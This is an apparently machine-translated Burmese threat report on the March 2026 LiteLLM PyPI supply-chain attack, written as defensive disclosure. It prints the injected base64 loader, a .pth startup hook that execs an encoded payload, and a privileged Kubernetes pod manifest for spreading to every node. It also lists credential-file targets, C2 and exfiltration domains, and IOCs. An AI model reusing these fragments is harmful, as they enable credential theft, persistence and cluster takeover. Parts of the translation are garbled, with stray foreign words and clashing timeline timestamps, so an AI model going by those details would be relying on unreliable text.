LiteLLM ထောက်ပံ့ရေးကွင်းဆက်တိုက်ခိုက်မှု

LiteLLM ထောက်ပံ့ရေးကွင်းဆက်တိုက်ခိုက်မှု- TeamPCP မှ နောက်ကွယ်မှ AI အခြေခံအဆောက်အအုံကို မည်သို့အသုံးပြုခဲ့သနည်း။

မာတိကာ

မဖြစ်မနေဖတ်သင့်သောပို့စ်များ

စိတ်ဝင်စားဖွယ်ကောင်းသော နောက်ဆုံးပို့စ်များ

အဘယ်ကြောင့်ဤသည်အရေးပါ

၂၀၂၆ ခုနှစ်၊ မတ်လ ၂၄ ရက်နေ့တွင် လူကြိုက်များသော Python package လစ်တယ်လ်မ်ထောင်ပေါင်းများစွာသော လူများအသုံးပြုသော universal LLM proxy gateway တစ်ခု enterpriseOpenAI၊ Anthropic၊ Google နှင့် AWS Bedrock ကဲ့သို့သော application များနှင့် AI provider များအကြား traffic ကို လမ်းကြောင်းပြောင်းရန် s သည် PyPI တွင် တိတ်တဆိတ် ခိုးယူခံခဲ့ရသည်။ အဆိပ်သင့်ဗားရှင်းနှစ်ခု (1.82.7 နှင့် 1.82.8) ကို ၁၃ မိနစ်အတွင်း ထုတ်ဝေခဲ့ပြီး၊ credentials များကို ခိုးယူသည့်၊ cloud secrets များကို ထုတ်ယူသည့်၊ Kubernetes clusters များတွင် ဘေးတိုက်ပျံ့နှံ့သည့် multi-stage payload တစ်ခုကို သယ်ဆောင်လာကာ remote code execution စွမ်းရည်များပါရှိသော persistent backdoor တစ်ခုကို ထည့်သွင်းခဲ့သည်။

ခန့်မှန်းခြေအားဖြင့်နှင့်အတူ နေ့စဉ် ဒေါင်းလုဒ်လုပ်သူ သန်း ၂၀၀ နှင့် cloud-native AI အခြေခံအဆောက်အအုံတစ်လျှောက်တွင် နက်ရှိုင်းစွာဖြန့်ကျက်ခြင်းဖြင့်၊ litellm သည် ခေတ်မီတိုက်ခိုက်သူများ လိုချင်တောင့်တသည့်အရာအားလုံး၏ လမ်းဆုံတွင်တည်ရှိသည်- အဓိက AI ပံ့ပိုးပေးသူတိုင်းအတွက် API key များ၊ cloud IAM အထောက်အထားများ၊ Kubernetes လျှို့ဝှက်ချက်များနှင့် SSH key များ။

ဒါပေမယ့် အသေးအဖွဲ ညှိနှိုင်းမှုဟာ သီးခြားဖြစ်ရပ်တစ်ခု မဟုတ်ပါဘူး။ ဒါဟာ အဆုံးသတ်တစ်ခုရဲ့ အထွတ်အထိပ်ပါ။ ငါးရက်ကြာ ငါးဂေဟစနစ် လှုပ်ရှားမှု အဖြစ် လူသိများသော ခြိမ်းခြောက်မှု သရုပ်ဆောင်တစ်ဦးမှ TeamPCPလုံခြုံရေးစကင်နာများ (Aqua Trivy၊ Checkmarx KICS) ကို ဦးစွာ အဆိပ်ခတ်ခဲ့သည့် လှုပ်ရှားမှုတစ်ခု၊ ထို့နောက် ခိုးယူခံရသော CI/CD npm၊ OpenVSX နှင့် နောက်ဆုံးတွင် PyPI ထဲသို့ အဆင့်ဆင့်ဝင်ရောက်ရန် အထောက်အထားများကို တိုက်ခိုက်သူများမှ ပေးပို့ခဲ့သည်။ တိုက်ခိုက်သူများသည် အဖွဲ့အစည်းများ ၎င်းတို့၏ ထောက်ပံ့ရေးကွင်းဆက်များကို ကာကွယ်ရန် အားကိုးနေရသောကိရိယာများကိုပင် လက်နက်အဖြစ် အသုံးပြုခဲ့ကြသည်။

ဤတိုက်ခိုက်မှုသည် ထောက်ပံ့ရေးကွင်းဆက်ခြိမ်းခြောက်မှု ရှုပ်ထွေးမှုတွင် အဆင့်ဆင့်ပြောင်းလဲမှုကို ကိုယ်စားပြုသည်။ multi-hop၊ cross-ecosystem ဒီဇိုင်းသည် မြင့်မားသောတန်ဖိုးသို့ရောက်ရှိရန် လုံခြုံရေးကိရိယာများကို ထိခိုက်စေသည် AI အခြေခံအဆောက်အအုံ၊ တိုးပွားလာသော ကုန်စည်အဖြစ် အသုံးချသည့် တိုက်ခိုက်မှုကိရိယာများနှင့် ကိုက်ညီသော စီမံကိန်းနှင့် လုပ်ငန်းလည်ပတ်မှု ရင့်ကျက်မှုအဆင့်ကို ထင်ဟပ်စေသည်။ payload များကို အချိန်နှင့်တပြေးညီ ထပ်ခါတလဲလဲ လုပ်ဆောင်ခဲ့သည် (မှတ်ချက်ပေးထားသော ယခင်ဗားရှင်းများအပါအဝင် source code တွင် payload မျိုးကွဲသုံးခု ပေါ်လာသည်)၊ C2 အခြေခံအဆောက်အအုံကို တိုက်ခိုက်မှုမတိုင်မီ တစ်ရက်အလိုတွင် မှတ်ပုံတင်ခဲ့ပြီး၊ exfiltration domain များကို တရားဝင်ရောင်းချသူ အခြေခံအဆောက်အအုံကို အတုယူရန် ဂရုတစိုက်ရွေးချယ်ခဲ့သည်။ Cardano signing key များနှင့် WireGuard config များကဲ့သို့သော niche target များအပါအဝင် အမျိုးအစား ၁၅+ ကို လွှမ်းခြုံထားသည့် စနစ်တကျပြည့်စုံသော credential harvester သည် AI-assisted malware ဖွံ့ဖြိုးတိုးတက်မှုကို force multiplier အဖြစ် ညွှန်ပြသည့် thoroughput အတိုင်းအတာကို အကြံပြုထားသည်။

timeline ကို

ရက်စွဲ (UTC) အဖြစ်အပျက်
မတ်လ 19 TeamPCP သည် Aqua Trivy GitHub Action tags များကို ထိခိုက်စေပြီး ၎င်းတို့ကို စိမ့်ဝင်ဖျက်ဆီးသည့် malicious code ဖြင့် အစားထိုးသည် CI/CD အောက်ပိုင်းသိုလှောင်ရုံများမှ လျှို့ဝှက်ချက်များ
မတ်လ 21 Compromise သည် Checkmarx KICS နှင့် AST GitHub Actions များသို့ အလားတူနည်းပညာများကို အသုံးပြု၍ တိုးချဲ့ထားသည်။
မတ်လ ၂၄ ရက်၊ ၁၀:၅၂ BerriAI သည် litellm 1.82.6 (နောက်ဆုံးသန့်ရှင်းသောဗားရှင်း) ကို ပုံမှန်အားဖြင့် ထုတ်ဝေသည်။ CI/CD pipeline လုံခြုံရေးစကင်ဖတ်ရန်အတွက် Trivy ကိုအသုံးပြုသည်
မတ်လ 23 TeamPCP သည် models.litellm.cloud (exfiltration domain) ကို မှတ်ပုံတင်သည်။ npm package ၆၆+ နှင့် OpenVSX extension များကို ထိခိုက်စေပါသည်။
မတ်လ ၂၄ ရက်၊ ၁၀:၅၂ litellm 1.82.7 ကို PyPI တွင် ထုတ်ဝေခဲ့သည် -- payload ထဲသို့ ထိုးသွင်းခဲ့သည် proxy_server.py module scope မှာ။ import လုပ်တဲ့အခါ execute လုပ်တယ်။
မတ်လ ၂၄ ရက်၊ ၁၀:၅၂ litellm 1.82.8 ကို ၁၃ မိနစ်အကြာတွင် ထုတ်ဝေခဲ့သည် -- ထည့်သွင်းထားသည် litellm_init.pth၊ litellm import များတွင်သာမက Python interpreter startup တိုင်းတွင် execute လုပ်သည့် Python path configuration hook တစ်ခုဖြစ်သည်။ payload iteration များကို မြန်ဆန်စွာပြသသည်။
မတ်လ ၂၄ ရက်၊ ~၁၆:၀၀ PyPI သည် အသိုင်းအဝိုင်းအစီရင်ခံစာများပြီးနောက် ဗားရှင်းနှစ်ခုလုံးကို ဖယ်ရှားပါသည်။ CDN tarball များကို အသုံးပြုနိုင်သေးသော်လည်း ဗားရှင်းများကို အညွှန်းမှ လုံးဝဖျက်ပစ်ပါသည် (မဖယ်ရှားပါ)။

အလင်းရောင်ရရှိချိန်- ခန့်မှန်းခြေ ၅.၅ နာရီ။ ဤကာလအတွင်း မည်သည့် pip install litellm, pip install --upgrade litellmသို့မဟုတ် CI/CD pipeline နောက်ဆုံးထွက်ဗားရှင်းကို ဆွဲထုတ်ခြင်းဖြင့် payload ကို လုပ်ဆောင်ပေးမည်ဖြစ်သည်။

Malware ဘယ်လိုဝင်ရောက်လာခဲ့လဲ- အဆင့်ဆင့် အားနည်းချက်များ

litellm package ကို တိုက်ရိုက်ချိုးဖောက်ဝင်ရောက်ခြင်း မရှိပါ။ တိုက်ခိုက်သူသည် ၎င်းမှတစ်ဆင့် ရောက်ရှိခဲ့သည်။ နှစ်ဆင့် ထောက်ပံ့ရေးကွင်းဆက်တိုက်ခိုက်မှု:

Aqua Trivy GitHub Action (compromised March 19)     --> LiteLLM CI/CD pipeline runs Trivy without pinned version         --> Malicious Trivy exfiltrates PYPI_PUBLISH token from GitHub Actions runner             --> Attacker publishes poisoned litellm 1.82.7 and 1.82.8 directly to PyPI

LiteLLM များ CI/CD pipeline Trivy ကို လုံခြုံရေးစကင်နာအဖြစ် အသုံးပြုခဲ့သည် — အားနည်းချက်များကို ဖမ်းယူရန် ဒီဇိုင်းထုတ်ထားသော ကိရိယာကိုယ်တိုင်ကပင် တိုက်ခိုက်မှု လမ်းကြောင်းဖြစ်သည်။ အဘယ်ကြောင့်ဆိုသော် pipeline Trivy ကို pin လုပ်ထားခြင်းထက် mutable tag ဖြင့် ရည်ညွှန်းထားသည်။ commit SHA၊ အန္တရာယ်ရှိသော လုပ်ဆောင်ချက်သည် အလိုအလျောက် လုပ်ဆောင်သည်။ အန္တရာယ်ရှိသော Trivy လုပ်ဆောင်ချက်သည် ပတ်ဝန်းကျင်လျှို့ဝှက်ချက်များကို ထုတ်ယူသည်။ PYPI_PUBLISH တိုကင်ဖြင့် TeamPCP အား litellm PyPI ပရောဂျက်သို့ တိုက်ရိုက်ထုတ်ဝေခွင့်ပြုသည်။

ဤ “အစောင့်များကို ညှိနှိုင်းခြင်း” ဗျူဟာသည် TeamPCP campaign ၏ ထင်ရှားသော လက္ခဏာတစ်ခုဖြစ်သည်။ လုံခြုံရေး tools များ (Trivy၊ Checkmarx KICS) ကို ဦးစွာ ပစ်မှတ်ထားခြင်းဖြင့် တိုက်ခိုက်သူများသည် ထောက်လှမ်းမှုကို တစ်ပြိုင်နက်တည်း ပိတ်ပစ်ခဲ့ပြီး downstream supply chains များသို့ အခွင့်ထူးခံဝင်ရောက်ခွင့်ကို ရရှိခဲ့သည်။

နည်းပညာဆိုင်ရာ ခွဲခြမ်းစိတ်ဖြာမှု- ဝန်အား

ထိုးမှတ်များ

ဗားရှင်း 1.82.7 — မော်ဂျူးအဆင့် အကောင်အထည်ဖော်မှု litellm/proxy/proxy_server.py (လိုင်း ၁၂၈):

import subprocess, base64, sys, tempfile, os  b64_payload = "<~12KB base64 blob>"  with tempfile.TemporaryDirectory() as d:     p = os.path.join(d, "p.py")     with open(p, "wb") as f:         f.write(base64.b64decode(b64_payload))     subprocess.run([sys.executable, p])

ဒီကုဒ်က module scope မှာ dictionary literal နဲ့ original ကြားထဲမှာ ရှိတယ်။ showwarning() လုပ်ဆောင်ချက်။ ၎င်းသည် ချက်ချင်းလုပ်ဆောင်သည် litellm.proxy.proxy_server တင်သွင်းထားသည် — ၎င်းသည် litellm ၏ proxy လုပ်ဆောင်ချက်ကို အသုံးပြုသည့်အခါတွင် ဖြစ်ပေါ်သည်။

ဗားရှင်း 1.82.8 — ထည့်သွင်းထားသည် litellm_init.pth (Python လမ်းကြောင်း ပြင်ဆင်မှုဖိုင်):

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"], ...) 

Python ကို .pth ဖိုင်များ site-packages/ interpreter startup တိုင်းမှာ process လုပ်ပေမယ့် ምናልባት နဲ့စတဲ့ စာကြောင်းတွေပဲ ရှိပါတယ်၊ import ကုဒ်အဖြစ် execute လုပ်ပါတယ်။ attacker ဟာ payload တစ်ခုလုံးကို single ပေါ်မှာ chain လုပ်ခြင်းအားဖြင့် ဒါကို အခွင့်ကောင်းယူပါတယ်။ import ကြေငြာချက် import os, subprocess, sys; subprocess.Popen(...)ဒါက proxy_server.py injection ထက် အများကြီးပိုပြင်းထန်ပါတယ် — litellm ကို ဘယ်တော့မှ import မလုပ်ရင်တောင် Python process launch တိုင်းမှာ လည်ပတ်ပါတယ်။ pyproject.toml ဤဖိုင်ကို ဖြန့်ဖြူးမှုတွင် ထည့်သွင်းရန် ပြင်ဆင်ခဲ့သည်-

include = [     { path = "litellm_init.pth", format = ["sdist", "wheel"] } ]

ဗားရှင်း ၁.၈၂.၈ တွင် ရှိသည် သီးခြားအကောင်အထည်ဖော်မှုလမ်းကြောင်းနှစ်ခု: proxy_server.py injection (litellm proxy import တွင် fire ဖြစ်သည်) နှင့် .pth ဖိုင် (Python startup တိုင်းတွင် fire ဖြစ်သည်)။ redundancy သည် ထင်ရှားသည် - ၎င်းသည် မည်သည့်လမ်းကြောင်းကိုမဆို ရှာဖွေတွေ့ရှိခြင်း သို့မဟုတ် ဖယ်ရှားခြင်းမှ ကာကွယ်ပေးသည်။ 1.82.7 ပြီး ၁၃ မိနစ်အကြာတွင် import-time မှ startup-time execution သို့ မြင့်တက်လာခြင်းက attacker သည် deployment အောင်မြင်မှုကို စောင့်ကြည့်နေပြီး လျင်မြန်စွာ iterating လုပ်နေကြောင်း ညွှန်ပြသည်။

အဆင့် ၁: ပြည့်စုံသော အထောက်အထားများ စုဆောင်းခြင်း

ကုဒ်ဝှက်ထားသော အတွင်းပိုင်း script သည် စေ့စပ်သေချာသော အထောက်အထားဗလာဖြစ်သည်။ ၎င်းသည် os.walk()glob.glob()subprocess.check_output()နှင့် စနစ်တစ်ခုလုံးကို သုတ်သင်ရှင်းလင်းရန် ဖိုင်ကို တိုက်ရိုက်ဖတ်ရှုသည်-

အမျိုးအစား ပစ်မှတ်
စနစ်ပြန်လည်စစ်ဆေးခြင်း hostname, whoami, uname -a, ip addr, printenv, ip route
SSH ကို ~/.ssh/id_rsa, id_ed25519, id_ecdsa, authorized_keys, known_hosts, config; မှ host key များ /etc/ssh/
cloud (AWS) ~/.aws/credentials, ~/.aws/configIMDS အခန်းကဏ္ဍ အထောက်အထားများ မှတစ်ဆင့် 169.254.169.254လျှို့ဝှက်မန်နေဂျာ ListSecrets; SSM DescribeParameters
cloud (GCP) ~/.config/gcloud/ (ထပ်ခါတလဲလဲ); $GOOGLE_APPLICATION_CREDENTIALS
မိုးတိမ် (အပြာရောင်) ~/.azure/ (ထပ်ခါတလဲလဲ); ပတ်ဝန်းကျင် ကိန်းရှင်များ
Kubernetes ဝန်ဆောင်မှုအကောင့်တိုကင်များ; ca.crtအမည်နေရာ; kubectl get secrets --all-namespaces; K8s API မှတစ်ဆင့် လျှို့ဝှက်ချက်အားလုံးကို
ပတ်ဝန်းကျင်ဖိုင်များ .env, .env.local, .env.production, .env.development, .env.staging — ထပ်ခါတလဲလဲ ရှာဖွေခဲ့သည် (အနက် ၆) /home, /root, /opt, /srv, /var/www, /app, /data, /tmp
Docker ~/.docker/config.json, /kaniko/.docker/config.json
ပက်ကေ့ဂျ်တိုကင်များ ~/.npmrc, ~/.vault-token, ~/.netrc
ဒတောဘေ့စျ ~/.pgpass, ~/.my.cnf, /etc/mysql/my.cnf, /etc/redis/redis.confMongoDB config များ
TLS / SSL မှ သီးသန့်သော့များ /etc/ssl/private/၊ လက်မှတ်တွေကို Encrypt လုပ်ကြရအောင်၊ အားလုံး .pem/.key/.p12/.pfx ဖိုင်တွေ
git ~/.git-credentials, ~/.gitconfig
CI/CD terraform.tfvars, terraform.tfstate, .gitlab-ci.yml, Jenkinsfile, ansible.cfg
Crypto ပိုက်ဆံအိတ် Bitcoin၊ Ethereum keystore၊ Solana keypairs (validator၊ vote၊ stake၊ faucet)၊ Cardano signing keys၊ Litecoin၊ Dogecoin၊ Zcash၊ Dash၊ Ripple၊ Monero
Shell သမိုင်း .bash_history, .zsh_history, .mysql_history, .psql_history, .rediscli_history
စနစ်ခွင့်ပြုချက် /etc/passwd, /etc/shadow၊ auth logs (လက်ခံထားသော SSH sessions များ)
Webhook/API သော့များ Slack ဝဘ်အတွက် Grephooks, Discord ဝဘ်hooksconfig ဖိုင်များရှိ API keys/secrets များ
VPN ကို WireGuard မှ ပြင်ဆင်မှုများ /etc/wireguard/

ဒီ harvester ရဲ့ အတိုင်းအတာက စွယ်စုံကျမ်းတစ်ခုလိုပါပဲ။ cloud credentials တွေကိုသာမက cryptocurrency wallets, database passwords, VPN configurations နဲ့ CI/CD လျှို့ဝှက်ချက်များ — တိုက်ခိုက်သူသည် ဘက်ပေါင်းစုံမှ ခိုးယူခံရသော စနစ်များကို အမြတ်ထုတ်ရန် ရည်ရွယ်ထားကြောင်း ညွှန်ပြနေသည်။

အဆင့် 2- ကုဒ်ဝှက်ထားသော Exfiltration

ခိုးယူခံရသောဒေတာများကို hybrid encryption စနစ်ကိုအသုံးပြု၍ encrypt လုပ်ပြီး exfilt လုပ်သည်-

  • AES-၂၅၆-CBC စုဆောင်းထားသောဒေတာအားလုံးကို ကျပန်း 32-byte session key ဖြင့် encrypt လုပ်ခြင်း (မှတစ်ဆင့်) openssl enc)
  • RSA-4096 တိုက်ခိုက်သူ၏ embedded public key (OAEP padding မှတစ်ဆင့်) ကို အသုံးပြု၍ session key ကို encrypt လုပ်ခြင်း openssl pkeyutl)
  • ciphertext ဖိုင်နှစ်ခုလုံးကို bundle အနေနဲ့ ပေါင်းစပ်ထားပါတယ် tpcp.tar.gz (ထို tpcp ရှေ့ဆက် — “TeamPCP” — သည် ကမ်ပိန်းတစ်လျှောက်တွင် တသမတ်တည်းပေါ်လာသည်)
  • HTTPS ပို့စ်တင်ရန် https://models.litellm.cloud/ နှင့် Content-Type: application/octet-stream

ဒိုမိန်း models.litellm.cloud မတ်လ ၂၃ ရက်နေ့တွင် — တိုက်ခိုက်မှုမတိုင်မီ တစ်ရက်အလို — တွင် မှတ်ပုံတင်ခဲ့ပြီး တရားဝင် litellm အခြေခံအဆောက်အအုံ (တကယ့်စီမံကိန်းက အသုံးပြုသည်) နှင့် ရောနှောရန် ဒီဇိုင်းထုတ်ထားသည်။ litellm.ai)။ egress traffic ကို ပြန်လည်သုံးသပ်သည့် network-aware defender တောင်မှ litellm ရဲ့ ကိုယ်ပိုင် model endpoint ဖြစ်ပုံရတဲ့ဆီကို traffic ကို flag မလုပ်နိုင်ပါဘူး။

အဆင့် ၃: အမြဲတမ်း Backdoor (sysmon.py)

payload သည် system telemetry အဖြစ် အယောင်ဆောင်ထားသော polling backdoor တစ်ခုကို ထည့်သွင်းသည်။

  • path~/.config/sysmon/sysmon.py
  • ဝန်ဆောင်မှုsysmon.service (systemd အသုံးပြုသူယူနစ်၊ “စနစ် တယ်လီမက်ထရီ ဝန်ဆောင်မှု” အဖြစ်ဖော်ပြထားသည်)
  • အပြုအမူစက္ကန့် ၃၀၀ အစောပိုင်း အိပ်စက်ပြီးနောက်၊ စစ်တမ်းကောက်ယူမှုများ https://checkmarx.zone/raw မိနစ် ၅၀ ~တိုင်း
  • သတ်ခြင်းC2 မှ ပြန်ပေးသော URL ကို ဒေါင်းလုဒ်လုပ်ပါ /tmp/pglog, ၎င်းကို executable အဖြစ် သတ်မှတ်သည် (chmod 755) ၎င်းကို သီးခြား session တစ်ခုတွင် လုပ်ဆောင်သည်
  • ပြည်နယ်ခြေရာခံခြင်း/tmp/.pg_state တူညီသော payload ကို ပြန်လည်ဒေါင်းလုဒ်လုပ်ခြင်းကို တားဆီးပေးသည်
  • ဇှဲကောငျးခွငျးRestart=alwaysRestartSec=10 — ပျက်ကျမှုများနှင့် ပြန်လည်စတင်မှုများမှ လွတ်မြောက်နိုင်သည်

ဒိုမိန်း checkmarx.zone သည် Checkmarx (လုံခြုံရေးကုမ္ပဏီ) ၏ typosquat တစ်ခုဖြစ်သည်။ checkmarx.com)၊ ကွန်ရက်မှတ်တမ်းများကို ပြန်လည်သုံးသပ်သော SOC ခွဲခြမ်းစိတ်ဖြာသူများသည် တရားဝင်လုံခြုံရေးရောင်းချသူဟုထင်ရသည့်အရာသို့ အသွားအလာကို မြင်တွေ့နိုင်စေရန် ဒီဇိုင်းထုတ်ထားသည်။ ၎င်းသည် လုံခြုံရေးရောင်းချသူအမှတ်တံဆိပ်နောက်ကွယ်တွင် ပုန်းအောင်းနေသည့် TeamPCP ၏ ပိုမိုကျယ်ပြန့်သော ဗျူဟာနှင့် ကိုက်ညီသော ရည်ရွယ်ချက်ရှိရှိ ရှောင်တိမ်းသည့်နည်းစနစ်တစ်ခုဖြစ်သည်။

အဆင့် ၃ခ: Kubernetes ဘေးတိုက်လှုပ်ရှားမှု

ခိုးယူခံရသောစနစ်တွင် Kubernetes ဝန်ဆောင်မှုအကောင့်အထောက်အထားများရှိပါက malware သည် cluster node အားလုံးကိုစာရင်းပြုစုပြီးဖြန့်ကျက်သည်။ အထူးအခွင့်အရေးရှိသော pods များ တစ်ခုချင်းစီသို့-

pod_manifest = {     'apiVersion': 'v1', 'kind': 'Pod',     'metadata': {'name': f'node-setup-{node_name[:35]}', 'namespace': 'kube-system'},     'spec': {         'nodeName': node_name,         'hostPID': True, 'hostNetwork': True,         'tolerations': [{'operator': 'Exists'}],         'containers': [{             'name': 'setup',             'image': 'alpine:latest',             'command': ['sh', '-c', drop_cmd],             'securityContext': {'privileged': True},             'volumeMounts': [{'name': 'host', 'mountPath': '/host'}]         }],         'volumes': [{'name': 'host', 'hostPath': {'path': '/'}}],         'restartPolicy': 'Never'     } }

ပေါ့ဒ်တစ်ခုစီ-

  • အဖြစ် လုပ်ဆောင်သည် အခွင့်ထူးခံ နှင့် hostPIDhostNetworkနှင့် host filesystem အပြည့်အဝ ဝင်ရောက်ခွင့်
  • အသုံးပြုခြင်း chroot /host အတူတူတပ်ဆင်ဖို့ sysmon.py host ရဲ့ root filesystem မှာ backdoor ရှိတယ်
  • ၎င်းကို systemd ဝန်ဆောင်မှုအဖြစ် မှတ်ပုံတင်ပြီး pod ဖျက်ခြင်းတွင် persistence သည် ဆက်လက်တည်ရှိနေကြောင်း သေချာစေသည်။
  • အမည် node-setup-* ထဲမှာ kube-system namespace ကို တရားဝင် cluster infrastructure အဖြစ် ပေါ်လာစေရန်

ဒါက ဆိုလိုတာက တစ်ယောက်တည်း ထိခိုက်မှု CI/CD K8s ဝင်ရောက်ခွင့်ရှိသော runner သည် cluster ရှိ node တိုင်းကို backdoor ဖြစ်သွားစေနိုင်သည် — Kubernetes တွင် litellm ကို proxy အဖြစ် အသုံးပြုနေသော အဖွဲ့အစည်းများအတွက် ဘေးတိုက်ရွေ့လျားမှု ကပ်ဘေးကြီးတစ်ခု။

Payload Evolution (မှတ်ချက်ပေးထားသော မျိုးကွဲများ)

လိုင်း ၁၃၁-၁၃၂ ရှိ source code တွင် attacker ၏ development လုပ်ငန်းစဉ်ကို ဖော်ပြထားသည့် comment ပေးထားသော payload variants နှစ်ခု ပါရှိသည်။

  • ဗားရှင်းသုံးမျိုးစလုံး တူညီသော စစ်ထုတ်မှု အခြေခံအဆောက်အအုံကို မျှဝေပါ (models.litellm.cloud) RSA-4096 အများသုံးသော့၊ AES-256-CBC + RSA ပေါင်းစပ်ကုဒ်ဝှက်စနစ်နှင့် tpcp.tar.gz အစုအဝေးအမည်ပေးခြင်း
  • ယခင်ဗားရှင်းများ ထည့်လိုက်တယ် RC4 ကုဒ်ဝှက်ခြင်းအလွှာ data collection script အတွင်းမှာ၊ outer AES+RSA wrapper မတိုင်ခင် ရိတ်သိမ်းရရှိထားတဲ့ data ကို encrypt လုပ်ပါတယ်။ ဒီ inner RC4 layer ကို ဖယ်ရှားခြင်းအားဖြင့် active payload (line 130) ကို ရိုးရှင်းအောင် ပြုလုပ်ထားပါတယ်။
  • ယခင်ဗားရှင်းများတွင် အသုံးပြုသည် exec() နှင့် StringIO collector ကို လုပ်ငန်းစဉ်အတွင်း လုပ်ဆောင်ရန် capture လုပ်နေစဉ်တွင်၊ active payload သည် အသုံးပြုသည် subprocess.run() stdout redirect ဖြင့် — host process ကို ညစ်ညမ်းစေခြင်းမှ ရှောင်ရှားသည့် ပိုမိုသန့်ရှင်းသော ခွဲထုတ်မှုတစ်ခု
  • မျိုးကွဲသုံးခုစလုံးသည် တူညီသော အထောက်အထားအမျိုးအစားများနှင့် စုဆောင်းမှုလမ်းကြောင်းများကို ပစ်မှတ်ထားသည်
  • အစောပိုင်းဗားရှင်းတွေမှာပါတဲ့ RC4 key ဟာ Telegram မှာ သရုပ်ဆောင်ရဲ့ အာရုံစိုက်မှုကို ရယူတဲ့ အပြုအမူနဲ့ ကိုက်ညီတဲ့ ဆွဲဆောင်မှုရှိတဲ့ အသုံးအနှုန်းတစ်ခု ဖြစ်ပါတယ်။

ဤသည်မှာ လုပ်ဆောင်ချက်အတွင်း တက်ကြွသော ဖွံ့ဖြိုးတိုးတက်မှုကို ဖော်ပြသည်။ တိုက်ခိုက်သူသည် encryption stack ကို ရိုးရှင်းအောင်ပြုလုပ်ပြီး collection targets များနှင့် exfiltration infrastructure များကို တည်ငြိမ်အောင်ထိန်းသိမ်းထားစဉ်တွင် execution isolation ကို တိုးတက်ကောင်းမွန်စေခဲ့သည်။

ညှိနှိုင်းမှု၏ ညွှန်ပြချက်များ (IOC များ)

Network

အညွှန်းကိန်း ပုံစံ ရည်ရွယ်ချက်
models.litellm.cloud ဒိုမိန်း Exfiltration endpoint (HTTPS POST)
checkmarx.zone ဒိုမိန်း C2 polling endpoint (HTTPS GET) /raw)

မှတ်ချက်- ပြင်ပအစီရင်ခံလင့်ခ်များ checkmarx.zone/static/checkmarx-util-1.0.4.tgz TeamPCP ကမ်ပိန်း၏ အစောပိုင်း KICS အဆင့်သို့။ ဤနေရာတွင် ခွဲခြမ်းစိတ်ဖြာထားသော litellm payloads တွင် ဤ URL ကို မတွေ့ရှိပါ။

ပက်ကေ့ချ် ဟာ့ရှ်များ

ဖိုင်မှတ်တမ်း SHA256
litellm-1.82.7.tar.gz 8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea
litellm-1.82.8.tar.gz d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5

ဖိုင်ထားသိုစနစ်

အညွှန်းကိန်း ပုံစံ ရည်ရွယ်ချက်
~/.config/sysmon/sysmon.py ဖိုင်မှတ်တမ်း အမြဲတမ်း backdoor script
~/.config/systemd/user/sysmon.service ဖိုင်မှတ်တမ်း စနစ်စွဲမြဲမှုယူနစ်
/tmp/pglog ဖိုင်မှတ်တမ်း ဒုတိယအဆင့် binary ကို ဒေါင်းလုဒ်လုပ်ပြီးပါပြီ
/tmp/.pg_state ဖိုင်မှတ်တမ်း C2 အခြေအနေ ခြေရာခံခြင်း
litellm_init.pth in site-packages/ ဖိုင်မှတ်တမ်း Python စတင်ချိတ်ဆက်မှု (v1.82.8 သာ)
tpcp.tar.gz ဖိုင်မှတ်တမ်း ကုဒ်ဝှက်ထားသော စစ်ထုတ်ခြင်းအစုအဝေး

Kubernetes

အညွှန်းကိန်း ပုံစံ ရည်ရွယ်ချက်
node-setup-* ဘူးခွံများ kube-system Pod အထူးအခွင့်အရေးရှိသော ဘေးတိုက်လှုပ်ရှားမှု pods များ
sysmon.service cluster node များပေါ်တွင် ဝန်ဆောင်မှု pod escape မှတစ်ဆင့် Host-level persistence

ကုဒ်ဝှက်ခြင်း

အညွှန်းကိန်း အသေးစိတ်
တိုက်ခိုက်သူ RSA-4096 အများသုံးသော့ SHA256 လက်ဗွေရာ: bc40e5e2c438032bac4dec2ad61eedd4e7c162a8b42004774f6e4330d8137ba8payload မျိုးကွဲသုံးခုလုံးတွင် ထည့်သွင်းထားသည်။ အခြား TeamPCP လုပ်ဆောင်ချက်များတွင် တူညီသော key ကို အစီရင်ခံထားသည်။
tpcp ရှေးဟောင်းပစ္စည်းများတွင် ရှေ့ဆက် အစုအဝေးအမည်ပေးခြင်းဆိုင်ရာ လုပ်ထုံးလုပ်နည်း (tpcp.tar.gz) ကမ်ပိန်းတစ်လျှောက် တသမတ်တည်းရှိသည်

ကိုးကားချက်- TeamPCP

ဤကမ်ပိန်း၏နောက်ကွယ်မှ ခြိမ်းခြောက်မှုသရုပ်ဆောင်ကို ခြေရာခံနေသည်မှာ အောက်ပါအတိုင်းဖြစ်သည်။ TeamPCPPCPcat၊ Persy_PCP၊ ShellForce နှင့် DeadCatx3 အဖြစ်လည်း လူသိများသည်။

လူသိများသော ဝိသေသလက္ခဏာများ-

  • Telegram ချန်နယ်များကို ထိန်းသိမ်းထားသည် @Persy_PCP နှင့် @teampcp သူတို့က လုံခြုံရေးကုမ္ပဏီတွေကို လှောင်ပြောင်ခဲ့တဲ့နေရာ
  • ဂေဟစနစ်များစွာ (GitHub Actions၊ PyPI၊ npm၊ OpenVSX) တွင် လည်ပတ်သည်
  • ကမ်ပိန်း၏ အဆင့်တိုင်းအတွက် ရောင်းချသူ-သီးသန့် typosquat domain များကို အသုံးပြုသည် (ဥပမာ- checkmarx.zone Checkmarx အတွက် models.litellm.cloud လစ်တဲလ်မ်အတွက်)
  • တသမတ်တည်းရှိသော အခြေခံအဆောက်အအုံ အမှတ်အသားများ- တူညီသော RSA သော့တွဲ၊ tpcp.tar.gz အမည်ပေးခြင်းဆိုင်ရာ သဘောတူညီချက်၊ tpcp-docs-* GitHub repositories များကို dead-drop staging အဖြစ်အသုံးပြုကြသည်။
  • လုံခြုံရေးကိရိယာများကို ထောက်ပံ့ရေးကွင်းဆက်များသို့ ဝင်ရောက်ရာနေရာများအဖြစ် ပစ်မှတ်ထားသည်

